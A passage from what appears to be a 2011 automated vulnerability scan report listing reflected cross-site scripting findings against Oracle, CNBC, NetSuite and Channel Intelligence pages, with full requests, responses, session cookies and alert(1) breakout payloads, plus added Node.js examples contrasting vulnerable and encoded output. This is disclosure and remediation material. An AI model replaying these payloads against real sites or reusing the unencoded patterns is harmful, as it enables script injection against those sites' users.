OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNtGu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:17:10 GMT
Set-Cookie: OAM_REQ=VERSION_4~kFAC1XaMEpaJ8SJOUrf%2fWt2Eo7fTd6kx5GkSobJXbTa9ofaZvm8X1pAbDFt2MEuS3MePYuT%2fmFC6jCqPOKsg5EGn8%2f5siYPls53KS2IfE5cAKYqV2nwLNlXuhTnUYD7%2bqgU6DNG1zrFdSZwFZvxFyciZDIbbbnhH9oRg0ceM1muAJi1B5fV43af5UynsM4YyGgbbfAlBREllNguLNsO9pgPSAgLfyd4J8jO1mR8hmBly2Qe1K8Tieg3%2fXbAEmyHqq8mBg8gmx4%2f7JOAbCcxazh%2brWrBI91l82SUGo8jfrb6mv7Am3WPBKU1mn48kN%2bqo2VJzi7%2fsLFGYYAnXWBwN7TjAFSkQzufA1dxnEwxBoVrJBif6NqyI5sc73QqvYIVs5s2uSoVB7OG4vusTIrSC3M1J%2bXw34SlfE6bwoWG7hXLJu%2fxGFD7tU7q6cnoKfMLgmk3RVX0WkuFW3l%2bNIRESpgSboEw1l80kwLoK5SB9TZhJ9U9B1LLNAKsjfaXmnYo7qK%2f9ATN1N7IxQht%2fXXmrWmsgSPIJWSCwMMYOqQ2mKce34pt0uSUhsDaGJrlfznnWIuParzsU26PBHAKlJlGGCAFsC1XiJQ9pygZGlYY7vWScqX37bn%2b%2fhLbSwbUQQu0y5z98Ulo%2b5IFLEPHYoOYJaWY4IuX%2fO0vKkiR8QgbH4bg%2fM6onyO9R%2f%2fdVrHGJJrJ%2fKrj00c%2fla7ybboS2B2PSyDf2BWQfi9EP5CMv8xmSwUVWpEf8YztPrfG6JBJt6sFIFZXLYyL9c3Lgh0Js63KCgdgTX5zatHuB9iQ%2b9vr%2bSHXkhdlkcTjBT3rKbEsEpxSgv2lavD2cqY8YSS2jwLZEvEcR1er6uRFGqya1OarXmPCdtpVogeosgxLQ%2bUAptgSI2sbJyRV%2f8fFlCu3WRB0otUeqy4dOida3y5yQ9mxxFfQar9jsGGvnEeX%2bhhsHo2PXtKnmfuGfUwyR6C8THvE4579RVsK84IEbwdym4Y0jvuQSFW81brTJ2JzejPjySRJDjAtdxl%2faO6SSI1B4FGvXS9lvaTvmPKCntQ%2bjbtwuN1kY7tjw9qplEyyxRJcA3ssOLdIvA4zwuVU0HwhaV4geRx7Uf94lsiEExtzGV2WPn9Y%2bc3X37HfRS3VshKqfNvksWF%2bbnL9fJRo3Z6V9Ho8BR3NbO%2bw%2fb4SPOP1grldEk6sBfPdD9knTg%2fTP1uM2ut2wR7doZ9YcUJZZ16%2f9trfZqHMjEX%2fiaKguZr46uYqTab2AK6dpfBmLNhNogN%2fPjJDVvbSwgJVDCXWY%2fPHLL4myDtby3Eyw7NQPgCUCK9s4T3NIUumy4Cnja86gM49x2Qa98H5TvFvv%2bzTMtB5yKYmSJfnpGViX0DZbiyV1E%2fZDQMP4btXxU3PTgqGbXx8ZYi3s61ou3twd3XAy8ulz4Z4BfaU7A%2fL2aB%2fSJzq8R%2f%2bdvQoskKYNJ39BX8ZIGoecc3vJTrnbVRFebOhc5P93wpRnhOeMughVxlUGmxnSx7ZiuirRQudGH4E8O7spt2Aaf5abIr62aflBa7yvQT%2bph5eVgyNyrS4P1OF%2f9oiDfhf8bb647N0kyr3JPyNDScpyqObS9CMjaVJUkcWKS7uakG8Vwsc1ndOVxHQRr8H1rW3SC3g3EfEzukgorgSTEWVMVk1Jm%2fUa2XDd89JKZHQJ3GMb5oZeTSn%2fR%2fFnUJr8OjZcE6BpcWS73EZN3WPDKjFkm8NVwKJGRXNcAwTWsca3SJEOOA%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXqFk6uHK6EVADUS1EHWFB01tasY
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:17:10 GMT; path=/
Content-Length: 2386

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...
<input type="hidden" name="request_id" value="-11174233175931698103c7b4"><script>alert(1)</script>d6751adef14af5029">
...[SNIP]...
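In 3.51 the request_id value lands inside a double-quoted attribute of a hidden input, so a " closes the attribute and the following > closes the tag; everything after that is parsed as markup. The Node.js script below is an added example and is not code from this report or from Oracle. It renders the hidden input the way the response above does (raw concatenation) and again through an attribute encoder, then runs both through a small tag tokenizer that honours quoted attribute values, to show that the encoded rendering yields a single input element while the raw one yields an extra script element. The function names and the tokenizer are invented for this example; the payload is the one from the 3.51 request. Escaping the five characters & < > " ' is only sufficient when the template always quotes the attribute value; an unquoted attribute is terminated by whitespace and needs a stricter encoder.

```javascript
// Added example (not from the report): a double-quoted attribute sink, as in
// the request_id hidden field of finding 3.51, with and without output encoding.

// Payload copied from the 3.51 request, appended to the legitimate-looking value.
const REQUEST_ID = '-11174233175931698103c7b4"><script>alert(1)</script>d6751adef14af5029';

// Vulnerable: the page's pattern, raw concatenation into a quoted attribute.
function renderHiddenInputVulnerable(name, value) {
  return '<input type="hidden" name="' + name + '" value="' + value + '">';
}

// Attribute encoder: the five characters that can change meaning inside a
// quoted attribute value. Only sufficient when the template always quotes.
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[ch]);
}

// Hardened: every attribute value goes through the encoder, nothing else changes.
function renderHiddenInputHardened(name, value) {
  return '<input type="hidden" name="' + encodeForHtmlAttribute(name) +
         '" value="' + encodeForHtmlAttribute(value) + '">';
}

// Minimal tag tokenizer: returns the names of the opening tags in the markup,
// skipping over attribute text so that a > inside a quoted value does not end
// the tag. A deliberately small model of the browser's tokenizer, not a parser.
function tagNames(markup) {
  const names = [];
  let i = 0;
  while (i < markup.length) {
    if (markup[i] !== "<") { i++; continue; }
    const m = /^<([a-zA-Z][a-zA-Z0-9]*)/.exec(markup.slice(i));
    if (!m) { i++; continue; }              // closing tag or stray <, not an element start
    names.push(m[1].toLowerCase());
    i += m[0].length;
    let quote = null;                        // consume attributes up to the closing >
    while (i < markup.length) {
      const ch = markup[i++];
      if (quote) { if (ch === quote) quote = null; }
      else if (ch === '"' || ch === "'") quote = ch;
      else if (ch === ">") break;
    }
  }
  return names;
}

console.log("raw:     ", tagNames(renderHiddenInputVulnerable("request_id", REQUEST_ID)));
console.log("encoded: ", tagNames(renderHiddenInputHardened("request_id", REQUEST_ID)));
```

With the payload above the raw rendering tokenizes to an input element followed by a script element, while the encoded rendering tokenizes to a single input whose value still contains the complete payload as inert text. The report also notes that the POST request could be replayed as a GET, which is what turns this injection into a link that can be delivered to a victim.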

3.52. http://m.cnbc.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62c45'-alert(1)-'fbc41ead6d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?62c45'-alert(1)-'fbc41ead6d9=1 HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; __qseg=Q_D; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339390340; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:12 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 13408
X-Aicache-OS: 64.210.193.250:80
Connection: Keep-Alive
Keep-Alive: max=20

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/?62c45'-alert(1)-'fbc41ead6d9=1&refresh=true\'',300000)</script>
...[SNIP]...
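The sink shown above is shared by findings 3.52 through 3.55: the request URL is concatenated into a single-quoted JavaScript string literal, and that literal sits inside a string that setTimeout later compiles as code. The data is therefore parsed twice, and a raw ' anywhere in the path or in a parameter name closes the outer string, which is why the '-alert(1)-' payload runs at page load rather than after the 300-second timer. The Node.js script below is an added example and is not code from this report or from the site's developers. It reproduces the vulnerable concatenation, then a hardened version that emits the URL as a JSON string literal (with <, >, &, U+2028 and U+2029 additionally escaped) and schedules the redirect through a function rather than a string, and compiles each generated script with stand-ins for the browser globals to record what it actually does. The function names and the harness are invented for this example; the payload and URL are taken from the 3.52 request.

```javascript
// Added example (not from the report): the inline-script redirect sink seen in
// 3.52 to 3.55, in its vulnerable form and a hardened form, plus a harness that
// compiles each generated script and records what it actually does.

// Payload copied from finding 3.52; the URL is constructed from that request.
const PAYLOAD = "62c45'-alert(1)-'fbc41ead6d9";
const SAMPLE_URL = "http://m.cnbc.com/?" + PAYLOAD + "=1";

// Vulnerable: the page's pattern. The URL is spliced into a single-quoted
// literal that sits inside a string, and setTimeout compiles that string as code.
// A raw ' in the URL closes the OUTER string, so anything after it is code.
function renderRefreshScriptVulnerable(url) {
  return "setTimeout('window.location.href=\\'" + url + "&refresh=true\\'',300000)";
}

// Hardened, step 1: turn data into a JavaScript string literal. JSON.stringify
// escapes quotes and backslashes; the extra replacements cover characters that
// are legal in JSON but dangerous inside a <script> block or in JS source.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")      // prevents </script> or <!-- inside the literal
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028") // line terminators: valid JSON, but break JS source
    .replace(/\u2029/g, "\\u2029");
}

// Hardened, step 2: pass a function to setTimeout, never a string, so the URL
// is a literal in exactly one parsing context and is never re-parsed as code.
function renderRefreshScriptHardened(url) {
  return "setTimeout(function(){window.location.href=" +
         jsStringLiteral(url + "&refresh=true") + "},300000)";
}

// Harness: compile the generated script with stand-ins for the browser globals.
// Records whether alert() ran and which URL the scheduled callback redirects to.
function analyze(scriptSource) {
  const result = { alertCalled: false, redirectTo: null, error: null };
  const fakeWindow = { location: { href: null } };
  const fakeAlert = () => { result.alertCalled = true; };
  const fakeSetTimeout = (cb) => {
    // A browser compiles a string callback as code; model that with Function.
    const fn = typeof cb === "string" ? new Function("window", "alert", cb)
             : typeof cb === "function" ? cb : null;
    if (fn) fn(fakeWindow, fakeAlert);
    result.redirectTo = fakeWindow.location.href;
  };
  try {
    new Function("setTimeout", "window", "alert", scriptSource)(fakeSetTimeout, fakeWindow, fakeAlert);
  } catch (e) {
    result.error = e.name;
  }
  return result;
}

// Round-trip check for the encoder: the literal must evaluate back to the input.
function roundTrips(value) {
  return new Function("return " + jsStringLiteral(value))() === value;
}

console.log("vulnerable:", analyze(renderRefreshScriptVulnerable(SAMPLE_URL)));
console.log("hardened:  ", analyze(renderRefreshScriptHardened(SAMPLE_URL)));
console.log("round-trip:", roundTrips("</script>\u2028'\"\\"));
```

Running it reports alertCalled: true for the vulnerable rendering (alert fires while the setTimeout argument is being evaluated, before any timer exists) and alertCalled: false with the URL intact for the hardened one. The same encoder covers the other JavaScript-string findings in this report (3.57 to 3.62), where the breakout is a " or ' followed by ; or -; the two points that matter are that quoting alone is not an encoding, and that the resulting string must never reach setTimeout, eval or another compile-and-run sink.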

3.53. http://m.cnbc.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e284c'-alert(1)-'58c7eb2456a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icoe284c'-alert(1)-'58c7eb2456a HTTP/1.1
Host: m.cnbc.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_cc=true; s_nr=1315339276909; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/memberCenter.do%2526ot%253DA; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2003|Q_2001|Q_1997|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_320|Q_316; __qca=P0-1990433296-1315339228713; SESS93eea98f293ea8fd633599e480cddfdc=7hpvssf67odmb1il9onl52ot53; s_vi=[CS]v1|27331BA1051D06AC-4000010700020B59[CE]; rnmd_test=x; rnmd_uuid=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:08:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=99
Content-Type: text/html; charset=utf-8
Via: 1.1 C aicache6
Content-Length: 4010
X-Aicache-OS: 64.210.193.252:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Wed, 07 Sep 2011 15:08:30 GMT

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/favicon.icoe284c'-alert(1)-'58c7eb2456a?refresh=true\'',300000)</script>
...[SNIP]...

3.54. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /mytest/ipecho.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e92'-alert(1)-'f261e685920 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mytestc3e92'-alert(1)-'f261e685920/ipecho.php HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:16 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 4643
X-Aicache-OS: 64.210.193.251:80
Connection: close

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/mytestc3e92'-alert(1)-'f261e685920/ipecho.php?refresh=true\'',300000)</script>
...[SNIP]...

3.55. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /mytest/ipecho.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59238'-alert(1)-'0408d9d8ef3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mytest/ipecho.php59238'-alert(1)-'0408d9d8ef3 HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:20 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 4642
X-Aicache-OS: 64.210.193.252:80
Connection: close

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/mytest/ipecho.php59238'-alert(1)-'0408d9d8ef3?refresh=true\'',300000)</script>
...[SNIP]...

3.56. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netsuite.tt.omtrdc.net
Path:   /m2/netsuite/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9ed34<script>alert(1)</script>42adcdc5dfa was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test9ed34<script>alert(1)</script>42adcdc5dfa&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:33:19 GMT; Path=/m2/netsuite
Content-Type: text/javascript
Content-Length: 214
Date: Tue, 06 Sep 2011 15:33:18 GMT
Server: Test & Target

mboxFactories.get('default').get('me-ecomm-form-test9ed34<script>alert(1)</script>42adcdc5dfa',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315341135013-154927.19");

3.57. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pg.links.channelintelligence.com
Path:   /pages/CBLJS.asp

Issue detail

The value of the sLinkJSData request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3d3c'%3balert(1)//7a40c4d48d9 was submitted in the sLinkJSData parameter. This input was echoed as f3d3c';alert(1)//7a40c4d48d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/CBLJS.asp?sLinkJSData=upc%3D047400098978f3d3c'%3balert(1)//7a40c4d48d9&cii_sSKU=047400098978&cii_nRGID=1964 HTTP/1.1
Host: pg.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 35613
Cache-Control: public, max-age=3563
Expires: Tue, 06 Sep 2011 17:45:22 GMT
Date: Tue, 06 Sep 2011 16:45:59 GMT
Connection: close


function ChangeRows(roForm,rnRows){roForm.nRows.value=rnRows;roForm.submit();}
function ChangePage(roForm,rnCurrentPage){roForm.nStart.options[rnCurrentPage].selected=true;roForm.submit();}

/*

...[SNIP]...
610","middle","center",true,"",true,false,false,false,true);goWin.focus();}
function cii_VARInfo(rsCustomer,rsZip,rsSKU,rnRGID,nPGID,nVID,nRadius,nHeight,nWidth,sStatusBar){var sUrl='?upc=047400098978f3d3c';alert(1)//7a40c4d48d9&cii_nSCID=28&cii_nCTID=29&cii_sZip='+rsZip+'&cii_sSKU='+escape(rsSKU).replace('+','%2B')+'&cii_nVID='+nVID+'&cii_nRGID='+rnRGID+'&cii_nPGID='+nPGID+'&cii_nRadius='+nRadius;var oWin=ykb_PopUp('VARInfo'
...[SNIP]...

3.58. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pg.links.channelintelligence.com
Path:   /pages/CBLJS.asp

Issue detail

The value of the sLinkJSData request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94563"%3balert(1)//be0c49fb5ff was submitted in the sLinkJSData parameter. This input was echoed as 94563";alert(1)//be0c49fb5ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/CBLJS.asp?sLinkJSData=upc%3D04740009897894563"%3balert(1)//be0c49fb5ff&cii_sSKU=047400098978&cii_nRGID=1964 HTTP/1.1
Host: pg.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 35613
Cache-Control: public, max-age=3554
Expires: Tue, 06 Sep 2011 17:45:08 GMT
Date: Tue, 06 Sep 2011 16:45:54 GMT
Connection: close


function ChangeRows(roForm,rnRows){roForm.nRows.value=rnRows;roForm.submit();}
